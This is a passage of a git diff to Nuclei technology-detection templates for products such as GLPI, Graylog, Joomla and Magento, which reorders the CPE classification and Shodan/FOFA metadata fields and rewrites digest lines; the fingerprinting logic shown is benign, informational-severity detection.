+ cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"glpi"
- product: glpi
vendor: glpi-project
+ product: glpi
+ shodan-query: http.html:"glpi"
tags: tech,status,glpi
- classification:
- cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
status:
- 200
-# digest: 490a0046304402200a32d522f5f00075eeeb3eb54bfad76315399d4ab6d356ad8788a0493e91601a022040a04b8cbbbd7f4c21319181ae9e3c1ae7e92d9cf1933397a89112eb2d6a7dc8:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402200a32d522f5f00075eeeb3eb54bfad76315399d4ab6d356ad8788a0493e91601a022040a04b8cbbbd7f4c21319181ae9e3c1ae7e92d9cf1933397a89112eb2d6a7dc8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/goliath-detect.yaml b/http/technologies/goliath-detect.yaml
index 39265f0951..fca84900cc 100644
--- a/http/technologies/goliath-detect.yaml
+++ b/http/technologies/goliath-detect.yaml
@@ -8,16 +8,16 @@ info:
Goliath is a non-blocking Ruby web server framework
reference:
- https://github.com/postrank-labs/goliath
+ classification:
+ cpe: cpe:2.3:a:goliath_project:goliath:*:*:*:*:ruby:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: 'Server: Goliath'
- product: goliath
vendor: goliath_project
+ product: goliath
+ shodan-query: 'Server: Goliath'
tags: tech,goliath
- classification:
- cpe: cpe:2.3:a:goliath_project:goliath:*:*:*:*:ruby:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
kval:
- Server
-# digest: 4a0a00473045022054f67669656a1ce1e97dc9462e2d19eb164aabeb16375e09052d83d000fcec0f022100e55c1cc61413ecbb93ee9c3fcc12eccc16a34bcef60cf8b13eda0e2cc74feb19:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022054f67669656a1ce1e97dc9462e2d19eb164aabeb16375e09052d83d000fcec0f022100e55c1cc61413ecbb93ee9c3fcc12eccc16a34bcef60cf8b13eda0e2cc74feb19:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/google/chromecast-detect.yaml b/http/technologies/google/chromecast-detect.yaml
index 429c6325ca..3d4ad6a029 100644
--- a/http/technologies/google/chromecast-detect.yaml
+++ b/http/technologies/google/chromecast-detect.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/thewhiteh4t/killcast/blob/ee81cfa03c963d47d3335770fcea2ca48bddeabf/killcast.py#L100C25-L100C43
- https://rithvikvibhu.github.io/GHLocalApi/#section/Google-Home-Local-API/Authentication
+ classification:
+ cpe: cpe:2.3:h:google:chromecast:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: Chromecast
- product: chromecast
vendor: google
+ product: chromecast
+ shodan-query: Chromecast
tags: google,chromecast,detect
- classification:
- cpe: cpe:2.3:h:google:chromecast:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/graylog/graylog-api-exposure.yaml b/http/technologies/graylog/graylog-api-exposure.yaml
index 9359e52316..accc4ad5a8 100644
--- a/http/technologies/graylog/graylog-api-exposure.yaml
+++ b/http/technologies/graylog/graylog-api-exposure.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://go2docs.graylog.org/5-0/setting_up_graylog/rest_api.html
- https://gist.github.com/asachs01/f1f317b2924a688deb8ed2520a4520bd
+ classification:
+ cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 50
- shodan-query: Graylog
- product: graylog
vendor: graylog
+ product: graylog
+ shodan-query: Graylog
tags: tech,graylog,api,swagger,fuzz
- classification:
- cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -92,4 +92,5 @@ http:
- "status_code == 401"
- "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')"
condition: and
-# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/hugo-detect.yaml b/http/technologies/hugo-detect.yaml
index aa38c4b59f..277f717c2c 100644
--- a/http/technologies/hugo-detect.yaml
+++ b/http/technologies/hugo-detect.yaml
@@ -5,16 +5,16 @@ info:
author: daffainfo
severity: info
description: Hugo is a fast and modern static site generator written in Go
+ classification:
+ cpe: cpe:2.3:a:gohugo:hugo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:'Hugo'
- product: hugo
vendor: gohugo
+ product: hugo
+ shodan-query: http.html:'Hugo'
tags: tech,hugo
- classification:
- cpe: cpe:2.3:a:gohugo:hugo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,4 @@ http:
regex:
- '(?m)'
-# digest: 490a004630440220603d57b1e53b35e6fec9364e65fed4928f3cea3292df4b644e176e36f21c514f02202dc3bd56e238afeb499095eb01af05edb802a66548c6d26d7c1e42a2ec11bd58:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220603d57b1e53b35e6fec9364e65fed4928f3cea3292df4b644e176e36f21c514f02202dc3bd56e238afeb499095eb01af05edb802a66548c6d26d7c1e42a2ec11bd58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/ibm/ibm-http-server.yaml b/http/technologies/ibm/ibm-http-server.yaml
index 0ac7c08c97..22c9abca69 100644
--- a/http/technologies/ibm/ibm-http-server.yaml
+++ b/http/technologies/ibm/ibm-http-server.yaml
@@ -4,15 +4,15 @@ info:
name: Default IBM HTTP Server
author: dhiyaneshDK,pussycat0x
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"IBM-HTTP-Server"
- product: http_server
- vendor: ibm
- tags: tech,ibm
-
classification:
cpe: cpe:2.3:a:ibm:http_server:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: ibm
+ product: http_server
+ shodan-query: http.title:"IBM-HTTP-Server"
+ tags: tech,ibm
+
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
regex:
- "IBM HTTP Server ([0-9.]+)"
-# digest: 490a0046304402206e7b93e6a0825caae64cc217d69555968c6a3c2f32b6ce510d8ec2a5176d7a24022023980a3da37a7b24368f2d66d5744390c5d0156788e4025b626e2972a9032f38:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206e7b93e6a0825caae64cc217d69555968c6a3c2f32b6ce510d8ec2a5176d7a24022023980a3da37a7b24368f2d66d5744390c5d0156788e4025b626e2972a9032f38:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/ibm/ibm-odm-detect.yaml b/http/technologies/ibm/ibm-odm-detect.yaml
index e3ba3b6deb..6facd30c24 100644
--- a/http/technologies/ibm/ibm-odm-detect.yaml
+++ b/http/technologies/ibm/ibm-odm-detect.yaml
@@ -8,16 +8,16 @@ info:
IBM Operational Decision Manager was detected.
reference:
- https://www.ibm.com/products/operational-decision-manager
+ classification:
+ cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: "icon_hash=\"707491698\""
- product: operational_decision_manager
vendor: ibm
+ product: operational_decision_manager
+ fofa-query: "icon_hash=\"707491698\""
tags: ibm,decision-center,tech,detect
- classification:
- cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221009fde9a9d99b03b9b2eddba0e3707bab095af7d6ffb09a75f72f876af01223254022100ddba1fd9377de788acdf1e8e88c42137b393c5cd18bc4c8ca0154150a676940f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009fde9a9d99b03b9b2eddba0e3707bab095af7d6ffb09a75f72f876af01223254022100ddba1fd9377de788acdf1e8e88c42137b393c5cd18bc4c8ca0154150a676940f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/icecast-server-detect.yaml b/http/technologies/icecast-server-detect.yaml
index 6dfb743b07..60b7f79de8 100644
--- a/http/technologies/icecast-server-detect.yaml
+++ b/http/technologies/icecast-server-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Icecast Streaming Media Server Detection
author: theamanrawat
severity: info
+ classification:
+ cpe: cpe:2.3:a:xiph:icecast:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Icecast Streaming Media Server"
- product: icecast
vendor: xiph
+ product: icecast
+ shodan-query: http.title:"Icecast Streaming Media Server"
tags: tech,icecast
- classification:
- cpe: cpe:2.3:a:xiph:icecast:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502204c630892412361b46b4fb74c2907df0b0eca95d61b5ebbfd75fc640367d9a5a3022100ff05a34447848b253688f47fdcad9df12af6abe0a6faba88a238ffe59acd9ad6:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502204c630892412361b46b4fb74c2907df0b0eca95d61b5ebbfd75fc640367d9a5a3022100ff05a34447848b253688f47fdcad9df12af6abe0a6faba88a238ffe59acd9ad6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/identity-server-v3-detect.yaml b/http/technologies/identity-server-v3-detect.yaml
index 3a196983fe..9d38aac22e 100644
--- a/http/technologies/identity-server-v3-detect.yaml
+++ b/http/technologies/identity-server-v3-detect.yaml
@@ -8,16 +8,16 @@ info:
Identity Server V3 technology was detected.
reference:
- https://identityserver.github.io/Documentation/
+ classification:
+ cpe: cpe:2.3:a:wso2:identity_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"IdentityServer v3"
- product: identity_server
vendor: wso2
+ product: identity_server
+ shodan-query: http.title:"IdentityServer v3"
tags: tech,identityserver,detect
- classification:
- cpe: cpe:2.3:a:wso2:identity_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,7 +25,6 @@ http:
host-redirects: true
max-redirects: 2
-
matchers:
- type: dsl
dsl:
@@ -39,4 +38,5 @@ http:
group: 1
regex:
- '(?i)build\s+([a-z0-9.-]+)'
-# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml
index b3ab6ec590..a791511045 100644
--- a/http/technologies/imgproxy-detect.yaml
+++ b/http/technologies/imgproxy-detect.yaml
@@ -8,16 +8,16 @@ info:
imgproxy is a fast and secure standalone server for resizing, processing, and converting images.
reference:
- https://imgproxy.net/
+ classification:
+ cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"imgproxy"
- product: imgproxy
vendor: evilmartians
+ product: imgproxy
+ shodan-query: html:"imgproxy"
tags: imgproxy,tech,detect
- classification:
- cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- 'status_code == 200'
- 'contains(server, "imgproxy")'
condition: and
-# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/interactsh-server.yaml b/http/technologies/interactsh-server.yaml
index 4e35480ef1..03b3b9a691 100644
--- a/http/technologies/interactsh-server.yaml
+++ b/http/technologies/interactsh-server.yaml
@@ -4,16 +4,16 @@ info:
name: Interactsh Server
author: pdteam
severity: info
+ classification:
+ cpe: cpe:2.3:a:projectdiscovery:interactsh:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"Interactsh Server"
- product: interactsh
vendor: projectdiscovery
+ product: interactsh
+ shodan-query: http.html:"Interactsh Server"
tags: tech,interactsh
- classification:
- cpe: cpe:2.3:a:projectdiscovery:interactsh:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
- '(.*)<\/b> server'
- 'from (.*)<\/b>'
-# digest: 4a0a00473045022023737e1314fc6dd3f91d1976e2f3fa59649ee694a17fbbf5f3e76b0f653aee47022100b2d374fd707bd73c49c443354dfca7eb684339384d5631dcbd25098e20890ec3:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022023737e1314fc6dd3f91d1976e2f3fa59649ee694a17fbbf5f3e76b0f653aee47022100b2d374fd707bd73c49c443354dfca7eb684339384d5631dcbd25098e20890ec3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/ispyconnect-detect.yaml b/http/technologies/ispyconnect-detect.yaml
index af83519262..a68b06c5c7 100644
--- a/http/technologies/ispyconnect-detect.yaml
+++ b/http/technologies/ispyconnect-detect.yaml
@@ -4,16 +4,16 @@ info:
name: iSpyConnect - Detect
author: arafatansari
severity: info
+ classification:
+ cpe: cpe:2.3:a:ispyconnect:ispy:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"iSpy"
- product: ispy
vendor: ispyconnect
+ product: ispy
+ shodan-query: http.html:"iSpy"
tags: tech,ispy
- classification:
- cpe: cpe:2.3:a:ispyconnect:ispy:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
words:
- 'Server: iSpy'
-# digest: 4a0a0047304502210086f9addf2070354a0b68754784b5e4ea7c8916953952ab1f1554da34155d0a3d02201d2e299895ec3a85e134c9f57a8175a63cb852a1d1a4b2b894b6ed65f1c8358a:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502210086f9addf2070354a0b68754784b5e4ea7c8916953952ab1f1554da34155d0a3d02201d2e299895ec3a85e134c9f57a8175a63cb852a1d1a4b2b894b6ed65f1c8358a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/jeecg-boot-detect.yaml b/http/technologies/jeecg-boot-detect.yaml
index 6d6f5bba6b..ac85477540 100644
--- a/http/technologies/jeecg-boot-detect.yaml
+++ b/http/technologies/jeecg-boot-detect.yaml
@@ -6,15 +6,15 @@ info:
severity: info
reference:
- http://www.jeecg.com/
- metadata:
- max-request: 2
- fofa-query: title="Jeecg-Boot"
- product: jeecg_boot
- vendor: jeecg
- tags: jeecg-boot,tech
-
classification:
cpe: cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: jeecg
+ product: jeecg_boot
+ fofa-query: title="Jeecg-Boot"
+ tags: jeecg-boot,tech
+
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
words:
- "Jeecg-Boot"
-# digest: 490a00463044022001a31aa66fe94e9217ab94ec8b12b379debf3f8e31956d78e0eb23606ac1cc9202202e69fbd4553fed114ef2923d7e9d769f8f8b75a57adc610b43f5dd29914e690d:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022001a31aa66fe94e9217ab94ec8b12b379debf3f8e31956d78e0eb23606ac1cc9202202e69fbd4553fed114ef2923d7e9d769f8f8b75a57adc610b43f5dd29914e690d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/jellyfin-detect.yaml b/http/technologies/jellyfin-detect.yaml
index 472f23f5f1..62b5a4bd71 100644
--- a/http/technologies/jellyfin-detect.yaml
+++ b/http/technologies/jellyfin-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Jellyfin detected
author: dwisiswant0
severity: info
+ classification:
+ cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
- shodan-query: http.html:"Jellyfin"
- product: jellyfin
vendor: jellyfin
+ product: jellyfin
+ shodan-query: http.html:"Jellyfin"
tags: tech,jellyfin
- classification:
- cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100e7945c18c896fbc9d6dc22f9501ee24fc722cbdf0a93c829a334d41f17236e53022100dbf14f47f4d04693cdbbc12091ef6dc5e1d07f7355e964288fa6ab9b0a1c8690:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e7945c18c896fbc9d6dc22f9501ee24fc722cbdf0a93c829a334d41f17236e53022100dbf14f47f4d04693cdbbc12091ef6dc5e1d07f7355e964288fa6ab9b0a1c8690:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/jhipster-detect.yaml b/http/technologies/jhipster-detect.yaml
index db13819701..b1220b6072 100644
--- a/http/technologies/jhipster-detect.yaml
+++ b/http/technologies/jhipster-detect.yaml
@@ -4,16 +4,16 @@ info:
name: JHipster Detect
author: righettod
severity: info
+ classification:
+ cpe: cpe:2.3:a:jhipster:jhipster:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.html:"JHipster"
- product: jhipster
vendor: jhipster
+ product: jhipster
+ shodan-query: http.html:"JHipster"
tags: tech,jhipster
- classification:
- cpe: cpe:2.3:a:jhipster:jhipster:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
- 'jhipster-error'
condition: or
-# digest: 490a0046304402207fb03d0951d123f967236cdd360ae10573cd25a48cbc198d3bfe950daa880b8202204f56e01b491e079da057224b5d092059d35aadd2e10bbb00cd07204c073b522e:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402207fb03d0951d123f967236cdd360ae10573cd25a48cbc198d3bfe950daa880b8202204f56e01b491e079da057224b5d092059d35aadd2e10bbb00cd07204c073b522e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/jitsi-meet-detect.yaml b/http/technologies/jitsi-meet-detect.yaml
index 5517df9adb..3e6297d266 100644
--- a/http/technologies/jitsi-meet-detect.yaml
+++ b/http/technologies/jitsi-meet-detect.yaml
@@ -4,15 +4,15 @@ info:
name: Jitsi Meet Page Detect
author: dhiyaneshDK
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Jitsi Meet"
- product: meet
- vendor: jitsi
- tags: tech,jitsi
-
classification:
cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:docker:*:*:*
+ metadata:
+ max-request: 1
+ vendor: jitsi
+ product: meet
+ shodan-query: http.title:"Jitsi Meet"
+ tags: tech,jitsi
+
http:
- method: GET
path:
@@ -29,4 +29,4 @@ http:
status:
- 200
-# digest: 4b0a004830460221009463dfd7edff4d388faf7f4a580e512ccf90e8da4814a402e4fa26a137e42028022100b3f10bef6688780ac4c20a1b042eb013ca017bba8ea5f0492188ded27ced3835:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221009463dfd7edff4d388faf7f4a580e512ccf90e8da4814a402e4fa26a137e42028022100b3f10bef6688780ac4c20a1b042eb013ca017bba8ea5f0492188ded27ced3835:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/joomla-detect.yaml b/http/technologies/joomla-detect.yaml
index 54aaf6f94e..606da81585 100644
--- a/http/technologies/joomla-detect.yaml
+++ b/http/technologies/joomla-detect.yaml
@@ -11,16 +11,16 @@ info:
- https://github.com/joomla/joomla-cms
- https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website
- https://hackertarget.com/attacking-enumerating-joomla/
+ classification:
+ cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
- google-query: Joomla! Administration Login inurl:"/index.php" || intitle:"Joomla Web Installer"
- product: joomla\\!
vendor: joomla
+ product: joomla\\!
+ google-query: Joomla! Administration Login inurl:"/index.php" || intitle:"Joomla Web Installer"
tags: tech,joomla,cms,oss
- classification:
- cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -60,4 +60,4 @@ http:
- '(?i)Joomla_([\d.|\d]+)_version_history'
part: body
-# digest: 4b0a00483046022100b98eef55dbf7bc0eb9c31e6dfaf23c8061227bec12c392230d6a4fa341e6672f022100d83e9c47d57d481a2d6e772b3c7defc5dff5f125e045297c49d70c85c7616200:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100b98eef55dbf7bc0eb9c31e6dfaf23c8061227bec12c392230d6a4fa341e6672f022100d83e9c47d57d481a2d6e772b3c7defc5dff5f125e045297c49d70c85c7616200:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/kodexplorer-detect.yaml b/http/technologies/kodexplorer-detect.yaml
index d856052790..95cadaf7ff 100644
--- a/http/technologies/kodexplorer-detect.yaml
+++ b/http/technologies/kodexplorer-detect.yaml
@@ -4,15 +4,15 @@ info:
name: KodExplorer-detect
author: ffffffff0x
severity: info
- metadata:
- max-request: 1
- fofa-query: app="Powered-by-KodExplorer"
- product: kodexplorer
- vendor: kodcloud
- tags: kodexplorer,tech
-
classification:
cpe: cpe:2.3:a:kodcloud:kodexplorer:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: kodcloud
+ product: kodexplorer
+ fofa-query: app="Powered-by-KodExplorer"
+ tags: kodexplorer,tech
+
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
regex:
- 'Powered by KodExplorer ([a-z0-9.]+) \|'
-# digest: 4a0a0047304502204de33e8a5b1cbb263d5cfbea0b14b7bfa5db83f2dd5a4294642ed20d0122bf2c0221009469d28eea0b8658f626256c905cd44f5a1b7d54c790613f38c5131f7fc25697:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502204de33e8a5b1cbb263d5cfbea0b14b7bfa5db83f2dd5a4294642ed20d0122bf2c0221009469d28eea0b8658f626256c905cd44f5a1b7d54c790613f38c5131f7fc25697:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/landesk/landesk-ma.yaml b/http/technologies/landesk/landesk-ma.yaml
index f290195513..7355f4eb0c 100644
--- a/http/technologies/landesk/landesk-ma.yaml
+++ b/http/technologies/landesk/landesk-ma.yaml
@@ -4,16 +4,16 @@ info:
name: LANDESK(R) Management Agent Detect
author: 0xNirvana
severity: info
+ classification:
+ cpe: cpe:2.3:a:landesk:landesk_management_suite:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"LANDESK(R)"
- product: landesk_management_suite
vendor: landesk
+ product: landesk_management_suite
+ shodan-query: http.html:"LANDESK(R)"
tags: tech,landesk
- classification:
- cpe: cpe:2.3:a:landesk:landesk_management_suite:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -27,4 +27,4 @@ http:
- "Management Agent"
condition: and
-# digest: 4a0a00473045022100d388e76b1f498ed9cb53dc45ec6b1e2d5788b4b584cddcc0958ac1570d004e0e02202700c461d43a60cc645dd7e0de36e8c209cccfa10ea427e603ee2bd16d4a17d2:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d388e76b1f498ed9cb53dc45ec6b1e2d5788b4b584cddcc0958ac1570d004e0e02202700c461d43a60cc645dd7e0de36e8c209cccfa10ea427e603ee2bd16d4a17d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/limesurvey-detect.yaml b/http/technologies/limesurvey-detect.yaml
index 1ca5a1ada7..9e3f757646 100644
--- a/http/technologies/limesurvey-detect.yaml
+++ b/http/technologies/limesurvey-detect.yaml
@@ -8,16 +8,16 @@ info:
Limesurvey is the number one open-source survey software. Advanced features like branching and multiple question types make it a valuable partner for survey-creation.
reference:
- https://github.com/LimeSurvey/LimeSurvey
+ classification:
+ cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:1781653957
- product: limesurvey
vendor: limesurvey
+ product: limesurvey
+ shodan-query: http.favicon.hash:1781653957
tags: tech,limesurvey
- classification:
- cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100c785935a42c9693f0bfd8dc790217cb13b8524ec59a862d42b0980b290c4b58602203a031943f0c70c1cae370d25197e1454f98980705027ddabca0e72bad0c11ac8:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100c785935a42c9693f0bfd8dc790217cb13b8524ec59a862d42b0980b290c4b58602203a031943f0c70c1cae370d25197e1454f98980705027ddabca0e72bad0c11ac8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/livehelperchat-detect.yaml b/http/technologies/livehelperchat-detect.yaml
index 309d2c64de..0b27b5c76b 100644
--- a/http/technologies/livehelperchat-detect.yaml
+++ b/http/technologies/livehelperchat-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Live Helper Chat Detect
author: pikpikcu,ricardomaia
severity: info
+ classification:
+ cpe: cpe:2.3:a:livehelperchat:live_helper_chat:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- fofa-query: title="Live Helper Chat"
- product: live_helper_chat
vendor: livehelperchat
+ product: live_helper_chat
+ fofa-query: title="Live Helper Chat"
tags: livehelperchat,tech
- classification:
- cpe: cpe:2.3:a:livehelperchat:live_helper_chat:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -44,4 +44,4 @@ http:
regex:
- '^(?i)((\d+\.)?(\d+\.)?(\*|\d+))v'
-# digest: 4a0a00473045022100d5459e39f5cdcc99770a5a997226fb3010e57b39602036f86330f86c9f210f1c022058c72da4e91f93fd6131cea8db8e0d9768bf75cbaa5d5083e4ed82f560609f5f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d5459e39f5cdcc99770a5a997226fb3010e57b39602036f86330f86c9f210f1c022058c72da4e91f93fd6131cea8db8e0d9768bf75cbaa5d5083e4ed82f560609f5f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/magento-detect.yaml b/http/technologies/magento-detect.yaml
index 16e2a0fa34..44991bf700 100644
--- a/http/technologies/magento-detect.yaml
+++ b/http/technologies/magento-detect.yaml
@@ -7,16 +7,16 @@ info:
description: Identify Magento
reference:
- https://devdocs.magento.com/guides/v2.4/graphql/
+ classification:
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.component:"Magento"
- product: magento
vendor: magento
+ product: magento
+ shodan-query: http.component:"Magento"
tags: magento,tech
- classification:
- cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,4 @@ http:
- 'status_code == 200'
condition: and
-# digest: 4a0a00473045022100d656eabddfff334ac0812c786782c0d7542971ca5873ac77407bb0fefada44bb0220299ba7fbf186ff6fa0a027db9e9b7195c197821775520ae435aa8926996334f0:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d656eabddfff334ac0812c786782c0d7542971ca5873ac77407bb0fefada44bb0220299ba7fbf186ff6fa0a027db9e9b7195c197821775520ae435aa8926996334f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/magmi-detect.yaml b/http/technologies/magmi-detect.yaml
index 82cb864148..64f3b642ec 100644
--- a/http/technologies/magmi-detect.yaml
+++ b/http/technologies/magmi-detect.yaml
@@ -4,16 +4,16 @@ info:
name: MAGMI (Magento Mass Importer) Plugin Detect
author: dwisiswant0
severity: info
+ classification:
+ cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.component:"Magento"
- product: magmi
vendor: magmi_project
+ product: magmi
+ shodan-query: http.component:"Magento"
tags: magento,magmi,plugin,tech
- classification:
- cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
